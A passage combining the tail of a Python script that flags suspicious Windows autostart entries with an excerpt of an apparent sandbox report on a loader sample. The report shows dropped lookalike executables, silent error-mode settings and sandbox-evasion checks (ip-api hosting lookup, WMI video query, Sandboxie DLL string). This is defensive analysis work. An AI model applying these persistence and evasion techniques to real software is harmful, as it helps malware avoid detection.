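    """Executable path from a Run-value command line: a quoted path, a bare path up
    to '.exe', or the whole string when neither applies (for example a .lnk path)."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        end = cmd.find('"', 1)
        return cmd[1:end] if end > 0 else cmd[1:]
    idx = cmd.lower().find(".exe")
    return cmd[:idx + 4] if idx >= 0 else cmd


def assess_autostart(name: str, command: str) -> dict:
    """Score one autostart entry: two or more signals -> 'suspicious', one -> 'review', none -> 'clean'."""
    path = exe_from_command(command)
    base = path.replace("/", "\\").rsplit("\\", 1)[-1]
    stem = os.path.splitext(base)[0]          # original case kept for looks_generated()
    low = path.lower().replace("/", "\\")
    reasons = []
    if any(frag in low for frag in USER_WRITABLE):
        reasons.append("target lives in a user-writable directory")
    known = lookalike_of(stem)
    if known:
        reasons.append(f"name imitates {known}.exe")
    if looks_generated(stem):
        reasons.append("machine-generated-looking file name")
    verdict = "suspicious" if len(reasons) >= 2 else "review" if reasons else "clean"
    return {"name": name, "target": path, "reasons": reasons, "verdict": verdict}


# Value names from the report; command data assumed to be the dropped file of the same
# name. The OneDrive line is a constructed benign entry showing the false-positive mode.
SAMPLE_RUN_VALUES = {
    "svhost": r"C:\Users\user\AppData\Roaming\svhost.exe",
    "HkqNfKUrMBAD": r"C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe",
    "I1y524I4zau1n3u": r"C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe",
    "OneDrive": r'"C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
}


def hunt_live() -> list:
    """Same checks against the local host's HKCU/HKLM Run keys and the user's Startup
    folder; returns [] when not on Windows. Shortcut targets are not resolved here
    (that needs the Shell COM API), so a .lnk is judged by its own name and location."""
    findings = []
    try:
        import winreg
    except ImportError:
        return findings
    for hive, label in ((winreg.HKEY_CURRENT_USER, "HKCU"), (winreg.HKEY_LOCAL_MACHINE, "HKLM")):
        try:
            key = winreg.OpenKey(hive, r"Software\Microsoft\Windows\CurrentVersion\Run")
        except OSError:
            continue
        i = 0
        while True:
            try:
                name, value, _ = winreg.EnumValue(key, i)
            except OSError:
                break
            findings.append((label + "\\...\\Run", assess_autostart(name, str(value))))
            i += 1
    startup = os.path.join(os.environ.get("APPDATA", ""), r"Microsoft\Windows\Start Menu\Programs\Startup")
    if os.path.isdir(startup):
        for entry in os.listdir(startup):
            if entry.lower().endswith(".lnk"):
                full = os.path.join(startup, entry)
                findings.append((full, assess_autostart(os.path.splitext(entry)[0], full)))
    return findings


if __name__ == "__main__":
    rows = [("HKCU\\...\\Run", assess_autostart(n, c)) for n, c in SAMPLE_RUN_VALUES.items()]
    for where, r in rows + hunt_live():
        print(f"{r['verdict']:<10} {where}\\{r['name']}: {'; '.join(r['reasons']) or '-'}")
```

On the report's entries, svhost and HkqNfKUrMBAD come out suspicious on two signals each, while I1y524I4zau1n3u only trips the generated-name check because `C:\Program Files (x86)\Windows NT` is not user-writable, and the benign OneDrive entry trips only the location check. Both land in "review", which is the point: location alone is a weak signal (plenty of legitimate software autostarts from AppData), so anything scored "review" should be confirmed by hash and Authenticode signature rather than by path.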

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 occurrences)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 occurrences)
                        Source: C:\Users\user\Desktop\KoaguarLoader.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (2 occurrences)
                        Source: C:\Users\user\AppData\Local\Temp\KoaguarLoader.exe | Process information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe | Process information set: NOOPENFILEERRORBOX (54 occurrences)
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (113 occurrences)
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        These flags are the SEM_NOGPFAULTERRORBOX and SEM_NOOPENFILEERRORBOX error modes set through SetErrorMode: the first suppresses the Windows Error Reporting dialog on a crash, the second the "file not found" message box, so an unattended payload fails silently instead of leaving a dialog on screen. The indicator carries little weight on its own: powershell.exe, which the sample launches, accounts for 113 of the 173 entries in this group, and the mode is set by many legitimate hosts; the stronger evidence here is which binaries set it (the dropped svhost.exe, I1y524I4zau1n3u.exe and HkqNfKUrMBAD.exe), not the flag itself.
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Local\Comms\HkqNfKUrMBAD.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Program Files (x86)\Windows NT\I1y524I4zau1n3u.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\svhost.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: svhost.exe, 00000003.00000002.2138122248.0000000003111000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
